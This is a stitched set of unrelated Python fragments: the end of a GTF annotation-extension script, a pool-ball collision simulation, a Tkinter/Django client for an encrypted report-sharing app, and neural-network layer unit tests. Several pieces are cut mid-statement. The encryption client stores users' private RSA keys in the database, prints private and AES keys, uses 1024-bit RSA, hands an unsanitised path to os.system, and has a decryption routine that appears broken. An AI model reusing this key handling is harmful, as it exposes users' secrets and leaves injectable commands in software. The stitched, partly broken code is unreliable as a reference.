and end_extensions[gene_info][0][1] == stop):
line[4] = end_extensions[gene_info][1][1]
if line[8].endswith('extended_start'):
line[8] = line[8].rstrip() + ',extended_end'
else:
line[8] = line[8].rstrip() + ';tag=extended_end'
elif (strand == '-'
and end_extensions[gene_info][0][0] == start):
line[3] = end_extensions[gene_info][1][0]
if line[8].endswith('extended_start'):
line[8] = line[8].rstrip() + ',extended_end'
else:
line[8] = line[8].rstrip() + ';tag=extended_end'
tblout.writerow(line)
fi.close()
fo.close()
def write_updated_gtf_file(input_file, output_file, start_extensions, end_extensions):
if args.gzip:
fi = gzip.open(input_file, 'rt')
fo = gzip.open(output_file, 'wt')
else:
fi = open(input_file, 'rt')
fo = open(output_file, 'wt')
def process_attribs(attribs):
new_attribs = {}
attribs = filter(None, attribs.rstrip(' ').split(';'))
for attrib in attribs:
attrib = attrib.lstrip(' ').split(' ')
if attrib[0] == 'db_xref':
attrib = OrderedDict.fromkeys(attrib[1].strip('"').split(':'))
attrib = list(attrib.keys())
new_attribs[attrib[0]] = attrib[1].strip('"')
return new_attribs
tblin = csv.reader(fi, delimiter = '\t')
tblout = csv.writer(fo,
delimiter = '\t',
lineterminator = os.linesep,
quotechar = '\xb6' )
| |
import math
from random import *
import numpy as np
import matplotlib
from matplotlib import pyplot as plt
from matplotlib import animation
def main():
global m_ani
######################################################################
'''
The balls get sent to the translation matrix, which moves the balls slightly,
and then sends them back to
main. Then, the balls are sent to the collisions checker, which checks
collisions, then sends the balls and the collisions which it detected to
the resolver, which resolves the collisions and then returns the balls
to the collision detector which returns the balls to the main. This
process is iterated, as the conditions are currently set, 45000 times and
10 trials of this are carried out.
It is suggested you go make a sandwich or get a coffee if intending to
iterate more than ~750,000 times total.
'''
######################################################################
'''
R is the radius of the balls, a is the midway distance between the center of mass of two adjacent balls,
(a-R)=f is the largest possible pertubation of a ball so that no balls superimpose
'''
R = 3.0
a = 3.02
f = a - R
#this loops 10 times = 10 trials
y = 0
if y < 5:
'''
r_ij is a random number between 0 and 1. There are 15 values for i (representing each ball) and 2 values for j
(the first representing the magnitude of a random pertubation and a second
representing the direction of the random pertubation)
'''
r_11 = random()
r_12 = random()
r_21 = random()
r_22 = random()
r_31 = random()
r_32 = random()
r_41 = random()
r_42 = random()
r_51 = random()
r_52 = random()
r_61 = random()
r_62 = random()
r_71 = random()
r_72 = random()
r_81 = random()
r_82 = random()
r_91 = random()
r_92 = random()
r_101 = random()
r_102 = random()
r_111 = random()
r_112 = random()
r_121 = random()
r_122 = random()
r_131 = random()
r_132 = random()
r_141 = random()
r_142 = random()
r_151 = random()
r_152 = random()
r_v = random()
r_v2 = random()
'''
Each b_i is a ball, whose state is defined by 5 elements
[xposition, yposition, xvelocity, yvelocity, indentifying#]
The first terms in the xposition and yposition orient the balls
in an equilateral triangle. The orientation of this triangle is the
same as the triangle that this 'less than' and 'such that' sign
make: <|
The second terms in the xpos and ypos represent the pertubation of
each ball, which ensures that there is no overlap between the balls
The ball farthest left (b1) is given an initial velocity into the
other balls.
'''
b1 = [0.0, 0.0 + f*r_11*math.sin(2*math.pi*r_12), 500.0, 50.+r_v2*100., 0]
b2 = [math.sqrt(3)*a + f*r_21*math.cos(2*math.pi*r_22), -a + f*r_21*math.sin(2*math.pi*r_22), 0.0, 0.0, 1]
b3 = [math.sqrt(3)*a + f*r_31*math.cos(2*math.pi*r_32), a + f*r_31*math.sin(2*math.pi*r_32), 0.0, 0.0, 2]
b4 = [math.sqrt(3)*2.0*a + f*r_41*math.cos(2*math.pi*r_42), -2.0*a + f*r_41*math.sin(2*math.pi*r_42), 0.0, 0.0, 3]
b5 = [math.sqrt(3)*2.0*a + f*r_51*math.cos(2*math.pi*r_52), a*0.0 + f*r_51*math.sin(2*math.pi*r_52), 0.0, 0.0, 4]
b6 = [math.sqrt(3)*2.0*a + f*r_61*math.cos(2*math.pi*r_62), 2.0*a + f*r_61*math.sin(2*math.pi*r_62), 0.0, 0.0, 5]
b7 = [math.sqrt(3)*3.0*a + f*r_71*math.cos(2*math.pi*r_72), -3.0*a + f*r_71*math.sin(2*math.pi*r_72), 0.0, 0.0, 6]
b8 = [math.sqrt(3)*3.0*a + f*r_81*math.cos(2*math.pi*r_82), -a + f*r_81*math.sin(2*math.pi*r_82), 0.0, 0.0, 7]
b9 = [math.sqrt(3)*3.0*a + f*r_91*math.cos(2*math.pi*r_92), a + f*r_91*math.sin(2*math.pi*r_92), 0.0, 0.0, 8]
b10 = [math.sqrt(3)*3.0*a + f*r_101*math.cos(2*math.pi*r_102), 3.0*a + f*r_101*math.sin(2*math.pi*r_102), 0.0, 0.0, 9]
b11 = [math.sqrt(3)*4.0*a + f*r_111*math.cos(2*math.pi*r_112), -4.0*a + f*r_111*math.sin(2*math.pi*r_112), 0.0, 0.0, 10]
b12 = [math.sqrt(3)*4.0*a + f*r_121*math.cos(2*math.pi*r_122), -2.0*a + f*r_121*math.sin(2*math.pi*r_122), 0.0, 0.0, 11]
b13 = [math.sqrt(3)*4.0*a + f*r_131*math.cos(2*math.pi*r_132), 0.0*a + f*r_131*math.sin(2*math.pi*r_132), 0.0, 0.0, 12]
b14 = [math.sqrt(3)*4.0*a + f*r_141*math.cos(2*math.pi*r_142), 2.0*a + f*r_141*math.sin(2*math.pi*r_142), 0.0, 0.0, 13]
b15 = [math.sqrt(3)*4.0*a + f*r_151*math.cos(2*math.pi*r_152), 4.0*a + f*r_151*math.sin(2*math.pi*r_152), 0.0, 0.0, 14]
'''
m is the master list of all pool balls
'''
m = [b1, b2, b3, b4, b5, b6, b7, b8, b9, b10, b11, b12, b13, b14, b15]
'''
del_t is the time step
if delta t is of order 0.00000001, higher precision number types are needed
'''
del_t = 0.00001
print ""
#this loop means 45000 iterations of translate, check for collisions,
#and resolve collisions will be carried out
i = 0
NN = 500000
div = 50
m_ani = np.zeros((NN/div, 15, 5))
for i in range(0,NN):
'''
uncomment if you want to see the 10th balls velocity every 5000 iterations
'''
m = translation(m, del_t)
m = collision_detector(m, del_t)
if i%div == 0:
m_ani[i/div,:,:] = np.asarray(m)
#m_ani[i,:,:] = np.asarray(m)
'''
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlim(-100,100)
ax.set_ylim(-100,100)
fig.set_dpi(100)
particles, = ax.plot([], [], 'bo', ms=27)
def init():
particles.set_data([], [])
return particles,
def animate(i):
global m_ani
particles.set_data(m_ani[i,10,:], m_ani[i,10,:])
particles.set_markersize(3.)
return particles,
anim = animation.FuncAnimation(fig, animate,
init_func=init,
frames=360,
interval=20,
blit=False)
plt.show()
'''
'''
print np.shape(m_ani)
upto = 5000
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=120,alpha=0.4)
ax.plot(m_ani[:upto,:,0],m_ani[:upto,:,1])
ax.scatter(m_ani[upto,:,0],m_ani[upto,:,1],s=120)
ax.set_xlim(-180,60)
ax.set_ylim(-60,60)
plt.show()
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=120,alpha=0.4)
ax.plot(m_ani[:2*upto,:,0],m_ani[:2*upto,:,1])
ax.scatter(m_ani[2*upto,:,0],m_ani[2*upto,:,1],s=120)
ax.set_xlim(-180,60)
ax.set_ylim(-60,60)
plt.show()
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=120,alpha=0.4)
ax.plot(m_ani[:3*upto,:,0],m_ani[:3*upto,:,1])
ax.scatter(m_ani[3*upto,:,0],m_ani[3*upto,:,1],s=120)
ax.set_xlim(-180,60)
ax.set_ylim(-60,60)
plt.show()
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=120,alpha=0.4)
ax.plot(m_ani[:4*upto,:,0],m_ani[:4*upto,:,1])
ax.scatter(m_ani[4*upto,:,0],m_ani[4*upto,:,1],s=120)
ax.set_xlim(-180,60)
ax.set_ylim(-60,60)
plt.show()
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=120,alpha=0.4)
ax.plot(m_ani[:5*upto,:,0],m_ani[:5*upto,:,1])
ax.scatter(m_ani[5*upto,:,0],m_ani[5*upto,:,1],s=120)
ax.set_xlim(-180,60)
ax.set_ylim(-60,60)
plt.show()
'''
cm = matplotlib.cm.get_cmap('Set1')
colors=[cm(1.*i/15) for i in range(15)]
xy = range(15)
colorlist=[colors[x/2] for x in xy]
fig = plt.figure()
ax = plt.axes(xlim=(-180, 60), ylim=(-60, 60))
ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=300,c=colorlist,alpha=0.3)
line, = ax.plot([], [], lw=2)
scat = ax.scatter([], [], s = 300,c=colorlist)
def init():
scat.set_offsets([])
line.set_data([], [])
return scat, line
def animate(i):
x = m_ani[5*i,:,0]; y = m_ani[5*i,:,1]
x2 = m_ani[:5*i,0,0]; y2 = m_ani[:5*i,0,1]
data = np.hstack((x[:5*i,np.newaxis], y[:5*i, np.newaxis]))
scat.set_offsets(data)
line.set_data(x2, y2)
return scat, line
anim = animation.FuncAnimation(fig, animate, init_func=init,
frames=NN/div/5, interval=1, blit=False)
print 'done'
plt.show()
y += 1
m = np.asarray(m)
print np.shape(m)
def collision_detector(m, del_t):
'''
collisions looks at the distance from one ball's center
of mass to another ball's center of mass and determines
whether the distance is less than twice the radius of the
balls. Additionally, to avoid successive collisions between
the same two balls, it checks whether or not the balls
are moving toward each other. These two conditions define
a collision.
'''
'''
c is a list which collisions creates that pairs colliding
balls. c is then sent to the collision resolver
'''
c = []
R = 3.0
for i in m:
for j in m:
if j > i:
if math.sqrt((i[0]-j[0])**2 + (i[1]-j[1])**2) < 2*R:
if math.sqrt((i[0]-j[0]-del_t*(i[2]-j[2]))**2 + (i[1]-j[1]-del_t*(i[3]-j[3]))**2) > math.sqrt((i[0]-j[0])**2 + (i[1]-j[1])**2):
c.append([i,j])
'''
comment out if you want to see what is colliding with what, as collisions occur
print i[4], "with ", j[4]
'''
m = resolver(m,c)
return m
def resolver(m,c):
'''
The resolver takes 2 balls in c which have been determined to collide,
and changes the frame of reference so that one of them is at rest.
By doing this, one can use the principle that the ball initially with
zero velocity have a final velocity in the same direction as the vector
that connects the balls' center of masses. Additionally, the impacting ball's
final velocity will be in a direction orthogonal to this direction. This
resolver basically creates these direction vectors, and then projects
the initial velocity of the incoming ball onto these vectors to determine
the final velocities. After that is done, the translational velocity
that was subtracted to make one of the velocities zero is added back, and
then these new velocities are updated into the master list.
'''
for i in c:
k_1x = i[0][0] - i[1][0]
k_1y = i[0][1] - i[1][1]
k_2x = i[1][1] - i[0][1]
k_2y = i[0][0] - i[1][0]
rel_vel_x = i[0][2]
rel_vel_y = i[0][3]
i[1][2] = i[1][2] - i[0][2] #v2x after frame of reference | |
__author__ = 'Reid'
import os
import sys
from tkinter import *
from media.documents import *
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Project.settings')
import os
from Project.SecureWitness.models import Report, UserProfile, Upload
from django.contrib.auth.models import User
from datetime import datetime
from django.utils import timezone
import django
import tkinter as tk
from dev import encrypt
from Crypto.Cipher import AES
from Crypto import Random
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from base64 import *
import unittest
django.setup()
block = AES.block_size #16
class App(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
container = tk.Frame(self)
container.pack(side="top",fill="both",expand=True)
container.grid_rowconfigure(0,weight=1)
container.grid_columnconfigure(0,weight=1)
u = "NotAUser"
self.frames ={}
for F in (StartPage, ):
frame = F(self, container, self, u)
self.frames[F] = frame
frame.grid(row=0,column=0,sticky="nsew")
self.show_frame(StartPage)
def show_frame(self,c):
self.frames[c].tkraise()
print(self.frames)
def create_frame(self, c, u, k):
t = tk.Toplevel(self)
container = tk.Frame(self)
frame = c(t, container, self, u, k)
self.frames[c] = frame
frame.grid(row=0,column=0,sticky="nsew")
self.show_frame(c)
class BaseFrame(tk.Frame):
def __init__(self, window, parent, controller, userIn):
tk.Frame.__init__(self, parent)
self.controller = controller
self.grid()
self.create_widgets()
def create_widgets(self):
raise NotImplementedError
class StartPage(BaseFrame):
def create_widgets(self):
N = 0
label = tk.Label(self, text ="This is the start page")
label.grid(row=0)
e1 = Entry(self)
e3 = Entry(self)
e2 = Entry(self)
N+=1
tk.Label(self, text="Username").grid(row=N)
e1.grid(row=N, column=1)
N+=1
tk.Label(self, text="Password").grid(row=N)
e3.grid(row=N, column=1)
N += 1
tk.Label(self, text="PrivateKey").grid(row=N)
e2.grid(row=N, column=1)
def login():
uTry = e1.get()
pTry = e3.get()
kTry = e2.get()
userList = User.objects.all()
for u in userList:
if (uTry == u.username):
#print("Username is valid")
if(u.check_password(pTry)):
#print("Password is valid")
#try:
#try to make private key object
private = (kTry).encode('utf-8')
private = private[:31] + b'\n' + private[31:]
for i in range(1, 13):
private = private[:(31 + (65 * i))] + b'\n' + private[(31 + (65 * i)):]
private = private[:860] + b'\n' + private[860:]
priKey = RSA.importKey(private)
print(priKey)
userIn = uTry
self.controller.create_frame(PageOne, userIn, kTry)
break
#except:
#print("That is not a correct private key!")
#break
e1.delete(0, END)
e3.delete(0, END)
e2.delete(0, END)
N+=1
tk.Button(self, text='Quit', command=self.quit).grid(row=N, column=0,
sticky=W, pady=4)
tk.Button(self, text='Login', command=login).grid(row=N, column=1,
sticky=W, pady=4)
class PageOne(BaseFrame):
def __init__(self, window, parent, controller, userIn, priKey):
tk.Frame.__init__(self,parent)
global rKey
rKey = priKey
#print(userIn)
#get user from private key
#print(priKey)
if(userIn == None):
report_list = []
group_report_list = []
shared_report_list = []
public_report_list = []
admin_report_list = []
else:
group_report_list = []
report_list = Report.objects.filter(user__username=userIn)
u = User.objects.get(username=userIn)
g_list = []
#print(u)
for g in u.groups.all():
g_list.append(g)
g_report_list = Report.objects.filter(group__in=g_list).exclude(user=u).exclude(
sharedusers=u).exclude(private=False).order_by('timestamp')
for i in g_report_list:
if i not in group_report_list:
group_report_list.append(i)
# INTENTIONALLY DOESN'T EXCLUDE GROUPS, JUST LEAVE IT
shared_report_list = Report.objects.filter(sharedusers=u).exclude(user=u).exclude(
private=False).order_by('timestamp')
public_report_list = Report.objects.filter(private=False).exclude(user=u)
admin_report_list = Report.objects.exclude(user=u).exclude(group__in=g_list).exclude(
sharedusers=u).exclude(private=False).order_by('timestamp')
#List all available reports
#d = Report.objects.all()
#print(d)
dList = []
num = 1
for name in report_list:
dObject = (name, num)
dList.append(dObject)
num += 1
for name in group_report_list:
dObject = (name, num)
dList.append(dObject)
num += 1
for name in shared_report_list:
dObject = (name, num)
dList.append(dObject)
num += 1
for name in public_report_list:
dObject = (name, num)
dList.append(dObject)
num += 1
for name in admin_report_list:
dObject = (name, num)
dList.append(dObject)
num += 1
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
v = IntVar()
v.set(0)
var = StringVar()
selections = [
("Decrypt", 1),
("Download", 2)
]
decryptTrue = False
downloadTrue = False
def getDocfile():
#get timestamp
#turn into report
report = Report.objects.get(timestamp=var.get())
#find file(s) from report
upload = Upload.objects.filter(report=report)
fileList = []
for u in upload:
fileList.append(u.file)
#print(fileList)
#get address from file
addressList = []
address = BASE_DIR + '\\media\\'
for f in fileList:
addressList.append(address + str(f).replace('/', '\\'))
#print("addressList is: ")
#print(addressList)
if var1.get() == 1:
#print("DECRYPT!!")
timestamp = var.get()
#print(timestamp)
#report = Report.objects.get(timestamp=var.get())
#print(report)
#print(userIn)
#i = UserProfile.objects.all().filter(user__username=userIn)
u = UserProfile.objects.get(user__username=userIn)
aesKeyLocked = report.aesKey
print("aesKeyLocked is " + str(aesKeyLocked))
#print(rKey)
#DECRYPTION STUFF!!]
for a in addressList:
print("HeyyyyOooooo")
print(a)
print(rKey)
print("aesKeyLocked is " + str(aesKeyLocked))
decryptFile(a, rKey, aesKeyLocked)
if var2.get() == 1:
print("Opening file at " + address)
#os.system("start " + address)
def decryptLink():
print("decrypt: %d, \ndownload: %d"%(var1.get(), var2.get()))
label2 = tk.Label(window,
text="""Choose a file:""",
justify=LEFT,
padx=20).grid()
var1 = IntVar()
Checkbutton(window,
justify = CENTER,
text="decrypt",
width = 20,
padx = 50,
variable = var1).grid()
var2 = IntVar()
Checkbutton(window,
justify = CENTER,
text="download",
width = 20,
padx = 50,
variable=var2).grid()
for report, val in dList:
#print(name.docfile)
tk.Radiobutton(window,
justify = CENTER,
text=report,
indicatoron=0,
width=20,
padx=50,
variable=var,
command=getDocfile,
value=report.timestamp).grid()
Button(window, text="Quit", command=window.quit).grid()
Button(window, text="Show", command=decryptLink).grid()
class PageTwo(BaseFrame):
def __init__(self, window, parent, controller, userIn):
tk.Frame.__init__(self,parent)
def populateKeys():
u = UserProfile.objects.all()
for user in u:
rsaKey = RSA.generate(1024, Random.new().read)
rExport = rsaKey.exportKey('PEM')
uExport = rsaKey.publickey().exportKey('PEM')
user.publickey = uExport
user.tempprivate = rExport
user.save()
def encryptFile(fileIn, publickey):
aesKey = Random.new().read(16)
print("aesKeyUnlocked is " + str(aesKey))
encrypt.Encrypt(fileIn, aesKey)
pKey = (publickey).encode('utf-8')
public_key = pKey[:26] + b'\n' + pKey[26:]
for i in range(1, 4):
public_key = public_key[:(26 + (65 * i))] + b'\n' + public_key[(26 + (65 * i)):]
public_key = public_key[:246] + b'\n' + public_key[246:]
pubKey = RSA.importKey(public_key)
cipher = PKCS1_OAEP.new(pubKey)
aesKeyLocked = cipher.encrypt(aesKey)
return aesKeyLocked
def decryptFile(fileIn, privkey, aesKeyLocked):
private = (privkey).encode('utf-8')
private = private[:31] + b'\n' + private[31:]
print(len(private))
for i in range(1, 13):
private = private[:(31 + (65 * i))] + b'\n' + private[(31 + (65 * i)):]
private = private[:860] + b'\n' + private[860:]
priKey = RSA.importKey(private)
print("A")
uncipher = PKCS1_OAEP.new(priKey)
#aesKeyLEncode = aesKeyLocked.encode("utf-8")
#try:
print("B")
print(type(aesKeyLocked))
aesKeyUnlocked = uncipher.decrypt(pad(aesKeyLocked.encode('utf-8')).decode('utf-8'))
print("C")
print("aesKeyUnlocked is " + str(aesKeyUnlocked))
print("D")
encrypt.Decrypt(in_file=fileIn, key=aesKeyUnlocked)
#except ValueError:
#print("The wrong key has been used to decrypt!")
def pad(s):
return s + b"\0" * (AES.block_size - len(s) % AES.block_size)
def startApp():
root = Tk()
w = Label(root, text="Hello!")
w.pack()
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
logo = PhotoImage(file=BASE_DIR+"/static/meme_small.gif")
w1 = Label(root, image=logo).pack(side="right")
explanation = """at present, only
GIF and PPM/PGM
formats are supported,
but an interface
exists to allow
additional image file
formats to be added
easily."""
w2 = Label(root,justify=LEFT,
padx = 0,
pady = 0,
text=explanation).pack(side="left")
Label(root,
justify=CENTER,
padx = 100,
text = "Red Text in Times Font",
fg = "red",
font = "Times").pack()
Label(root,
text = "Green Text in Helvetica Font",
fg = "light green",
bg = "dark green",
font = "Helvetica 16 bold italic").pack()
Label(root,
text = "Blue Text in Verdana bold",
fg = "blue",
bg = "yellow",
font = "Verdana 10 bold").pack()
quote = "This is a quote, and it's going to be misquoted for the rest of eternity. \n(<NAME>)"
msg = Message(root, text = quote)
msg.config(bg='lightgreen', font=('times',24,'italic'))
msg.pack()
class Appp:
def __init__(self, root):
frame = Frame(root)
frame.pack()
self.button = Button(frame,
text="QUIT",fg="red",
command=frame.quit)
self.button.pack(side=LEFT)
self.slogan = Button(frame,
text="Hello",
command=self.write_slogan)
self.slogan.pack(side=LEFT)
def write_slogan(self):
#print("Hello you idiot!")
pass
app = Appp(root)
f1 = Frame(root)
v = IntVar()
v.set(0)
languages = [
("Python",1),
("Perl",2),
("Java",3),
("C++",4),
("C",5)
]
var = StringVar()
d = Report.objects.all()
dList = []
num = 1
for name in d:
dObject = (name, num)
dList.append(dObject)
num+=1
def getDocfile():
dLink = var.get().replace('/','\\')
address = BASE_DIR + '\\media\\' + dLink
#print("Opening file at " + address)
os.system("start "+address)
Label(root,
text="""Choose a file:""",
justify = LEFT,
padx = 20).pack()
frame = Frame(root)
frame.pack()
bottomFrame = Frame(root)
bottomFrame.pack(side = BOTTOM)
frame2 = Frame(root)
frame2.pack(side = RIGHT)
redButton = Button(frame, text="Red", fg="red")
redButton.pack(side = LEFT)
greenButton = Button(frame, text="Brown", fg="brown")
greenButton.pack(side = LEFT)
blueButton = Button(frame2, text="Blue", fg="blue")
blueButton.pack(side = LEFT)
blackButton = Button(bottomFrame, text="Black", fg="black")
blackButton.pack(side =BOTTOM)
#root.geometry("600x400+200+200")
root.title("StandAloneApp Test")
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
dLink = var.get().replace('/', '\\')
address = BASE_DIR + "\media\\files\\2015\\12\\06\\Llamas DB Poster 1-v1.pdf"
user = UserProfile.objects.get(user__username='User1')
pubKey = user.publickey
aesKeyLocked = encryptFile(address,pubKey)
print("1")
print(type(aesKeyLocked))
print("aesKeyLocked is " + str(aesKeyLocked))
print("2")
#need .enc after
priKey = user.tempprivate # to be given in App
#aesKeyLocked = aesKeyLocked.encode('utf-8')
print("3")
print(type(aesKeyLocked))
print(aesKeyLocked)
decryptFile(address+".enc",priKey,aesKeyLocked)
#Encrypt with whatever public key you want the owner of to see
#Decrypt with private key of public key
r = Report.objects.filter(user__username="admin")
#r = Report.objects.all()
for r2 in r:
#print(r2.key)
u = Upload.objects.all()
for u2 in u:
#Get
pass
#print(r)
"""
up = UserProfile.objects.get(user__username=uTry)
print(up.publickey)
"""
root.mainloop()
return 0
def encryptEasy(fileName, userName):
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
#Change dates if necessary
address = BASE_DIR + "\media\\files\\2015\\12\\07\\"
address = address + fileName
user = UserProfile.objects.get(user__username=userName)
pubKey = user.publickey
aesKeyLocked = encryptFile(address, pubKey)
print("aesKeyLocked is " + str(aesKeyLocked))
return(aesKeyLocked)
if __name__ == '__main__':
#populateKeys()
#startApp()
#EncryptEasy File
fileName = "ACM_Code_of_Ethics_Essay.docx"
userName = "admin"
aesKeyLocked = encryptEasy(fileName, userName) #string
print("aesKeyLocked is " | |
import math
import unittest
import numpy as np
from quasarnp.layers import (batch_normalization, conv1d, dense, flatten,
linear, relu, sigmoid)
class TestActivations(unittest.TestCase):
def test_linear(self):
# Test the liner activation for integers, positive and negative
self.assertEqual(linear(0), 0)
self.assertEqual(linear(1), 1)
self.assertEqual(linear(-1), -1)
# Test the linear activation for numpy arrays, both flat and 2d
in_arr = np.arange(-10, 10)
expected = np.arange(-10, 10)
self.assertTrue(np.allclose(linear(in_arr), expected))
in_arr = np.reshape(in_arr, (-1, 5))
expected = np.reshape(expected, (-1, 5))
self.assertTrue(np.allclose(linear(in_arr), expected))
def test_relu(self):
# Test the relu activation for integers, positive and negative
self.assertEqual(relu(0), 0)
self.assertEqual(relu(1), 1)
self.assertEqual(relu(-1), 0)
# Test the relu activation for numpy arrays, both flat and 2d
in_arr = np.arange(-10, 10)
expected = np.asarray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 2, 3, 4, 5, 6, 7, 8, 9])
self.assertTrue(np.allclose(relu(in_arr), expected))
in_arr = np.reshape(in_arr, (-1, 5))
expected = np.reshape(expected, (-1, 5))
self.assertTrue(np.allclose(relu(in_arr), expected))
def test_sigmoid(self):
# Test the sigmoid activation for integers, positive and negative
self.assertEqual(sigmoid(0), 0.5)
self.assertEqual(sigmoid(1), 1 / (1 + 1 / math.e))
self.assertEqual(sigmoid(-1), 1 / (1 + math.e))
# Test the relu activation for numpy arrays, both flat and 2d
in_arr = np.arange(-10, 10)
expected = 1 / (1 + np.exp(-in_arr))
self.assertTrue(np.allclose(sigmoid(in_arr), expected))
in_arr = np.reshape(in_arr, (-1, 5))
expected = np.reshape(expected, (-1, 5))
self.assertTrue(np.allclose(sigmoid(in_arr), expected))
class TestLayers(unittest.TestCase):
# For this test class we will assume that the activations are correct.
# We test those separately up above anyway.
def test_dense_weights(self):
# This test has all weights set to 0, but nonzero/nonunity bias
# This should mean the result is only the bias relu'd.
in_weights = np.zeros((11, 5))
in_bias = np.arange(-2, 3)
in_x = np.arange(-5, 6)
observed = dense(in_x, in_weights, in_bias, relu)
expected = [0, 0, 0, 1, 2]
self.assertTrue(np.allclose(observed, expected))
# Setting the weights to 1 and ensuring the answer remains correct.
# Since the input x array is symmetric the pre bias answer is still
# zeros.
in_weights = np.ones((11, 5))
observed = dense(in_x, in_weights, in_bias, relu)
expected = [0, 0, 0, 1, 2]
self.assertTrue(np.allclose(observed, expected))
def test_dense_bias(self):
# This test has all biases set to 0, but nonzero/nonunity weights
in_weights = [[1, 1, -5, -1, -1],
[1, 2, -4, -1, -2],
[1, 3, -3, -1, -3],
[1, 4, -2, -1, -4],
[1, 5, -1, -1, -5]]
in_weights = np.asarray(in_weights)
in_bias = np.zeros(5)
in_x = np.arange(-2, 3)
observed = dense(in_x, in_weights, in_bias, relu)
expected = [0, 10, 10, 0, 0]
self.assertTrue(np.allclose(observed, expected))
# Testing if we set the bias to 1 that the answer remains correct
# NOTE: The last weights product equals -10 so adding the
# 1 does not change the answer of the relu.
in_bias = np.ones(5)
observed = dense(in_x, in_weights, in_bias, relu)
expected = [1, 11, 11, 1, 0]
self.assertTrue(np.allclose(observed, expected))
# For testing flatten we need to test that the
# array only flattens everything except the first dimension AND
# that the flatten flattens in the correct order
# We split the tests by dimensionality to help diagnose any problems.
def test_flatten_2d(self):
# Creates array that looks like this:
# [1, 1, 1]
# [2, 2, 2]
# [3, 3, 3]
column = np.asarray([1, 2, 3])
in_x = np.asarray([column] * 3).T
# "Flatten" which does nothing here since we flatten higher dimensions
observed = flatten(in_x)
expected = in_x
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
def test_flatten_3d(self):
# Creates the following 3d array:
# [[[0 1], [2 3]],[[4 5],[6 7]]]
in_x = np.arange(0, 2 * 2 * 2).reshape((2, 2, 2))
# Flatten and test
observed = flatten(in_x)
expected = np.asarray([[0, 1, 2, 3], [4, 5, 6, 7]])
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
def test_flatten_4d(self):
# Creates the following 4d array:
# [[[[0 1], [2 3]], [[4 5], [6 7]]],
# [[[8 9], [10 11]], [[12 13], [14 15]]]]
in_x = np.arange(0, 2 * 2 * 2 * 2).reshape((2, 2, 2, 2))
# Flatten and test
observed = flatten(in_x)
expected = [[0, 1, 2, 3, 4, 5, 6, 7], [8, 9, 10, 11, 12, 13, 14, 15]]
expected = np.asarray(expected)
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# This tests batchnormalizing a scalar
def test_batch_normalization_scalar(self):
eps = 1e-7 # To avoid divide by zero errors
x = 3
mu = 2
var = 2
gamma = 1
beta = 0
# First test gamma = 1, beta = 0 so no scaling or offset
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = 1 / np.sqrt(2)
self.assertTrue(np.allclose(observed, expected))
# Scale by double
gamma = 2
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = 2 / np.sqrt(2)
self.assertTrue(np.allclose(observed, expected))
# Offset by one and scale by double.
beta = 1
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = 2 / np.sqrt(2) + 1
self.assertTrue(np.allclose(observed, expected))
# We here use a 2d vector instead of a scalar to make sure the array logic
# works out correctly
def test_batch_normalization_vector(self):
eps = 1e-7 # To avoid divide by zero errors
x = np.asarray([3, 2, 1])
mu = np.asarray([2, 2, 2])
var = np.asarray([2, 2, 2])
gamma = 1
beta = 0
# First test gamma = 1, beta = 0 so no scaling or offset
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = [1 / np.sqrt(2), 0, -1 / np.sqrt(2)]
self.assertTrue(np.allclose(observed, expected))
# Scale by double
gamma = 2
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = [2 / np.sqrt(2), 0, -2 / np.sqrt(2)]
self.assertTrue(np.allclose(observed, expected))
# Offset by one and scale by double.
beta = 1
observed = batch_normalization(x, mu, var, beta, gamma, eps)
expected = [2 / np.sqrt(2) + 1, 1, -2 / np.sqrt(2) + 1]
self.assertTrue(np.allclose(observed, expected))
def test_conv1d_base(self):
# Shape (batch_size, in_width, in_channels)
x = np.ones((5, 200, 5))
# Shape (filter_width, in_channels, out_channels)
w = np.ones((5, 5, 5))
# We expect that with the 25 filters that the convolution will give 25
# i.e. the sum of 25 ones
observed = conv1d(x, w)
expected = np.ones((5, 196, 5)) * 25
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Doubling the input to make extra sure it's good
x = x * 2
observed = conv1d(x, w)
expected = np.ones((5, 196, 5)) * 50
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Testing a more dynamic x array.
x = np.asarray([[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5]]).reshape(3, -1, 1)
w = np.ones((3, 1, 2))
observed = conv1d(x, w)
expected = [[[6, 6], [9, 9], [12, 12]],
[[6, 6], [9, 9], [12, 12]],
[[6, 6], [9, 9], [12, 12]]]
expected = np.asarray(expected)
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Same test as above, but where we set the stride to 2 instead of 1.
def test_conv1d_stride(self):
# Shape (batch_size, in_width, in_channels)
x = np.ones((5, 200, 5))
# Shape (filter_width, in_channels, out_channels)
w = np.ones((5, 5, 5))
# We expect that with the 25 filters that the convolution will give 25
# i.e. the sum of 25 ones
